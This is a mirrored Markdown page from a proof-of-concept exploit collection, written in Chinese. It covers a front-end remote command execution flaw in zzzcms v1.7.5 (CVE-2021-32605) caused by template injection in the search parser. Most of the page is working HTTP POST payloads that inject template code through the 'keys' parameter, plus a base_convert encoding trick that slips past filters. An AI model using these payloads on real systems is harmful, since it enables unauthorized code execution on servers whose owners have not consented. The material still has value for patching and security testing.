mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 12:25:11 +00:00
47 lines
749 B
Markdown
47 lines
749 B
Markdown
|
# zzzcms v1.7.5 前台远程命令执行漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
zzzcms v1.7.5 parserSearch 存在模板注入导致远程命令执行漏洞。
|
|||
|
|
|
|||
|
|
参考链接:
|
|||
|
|
|
|||
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-32605
|
|||
|
|
- https://www.anquanke.com/post/id/212272
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
zzzcms v1.7.5
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
执行 `phpinfo`:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
POST /?location=search HTTP/1.1
|
|||
|
|
Host: your-ip
|
|||
|
|
|
|||
|
|
keys={if:=phpinfo()}{end if}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
如果遇到拦截,编码绕过:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
<?php
|
|||
|
|
echo (base_convert("phpinfo()", 32, 10));
|
|||
|
|
?>
|
|||
|
|
-----
|
|||
|
|
27440799224
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
POST /?location=search HTTP/1.1
|
|||
|
|
Host: your-ip
|
|||
|
|
|
|||
|
|
keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|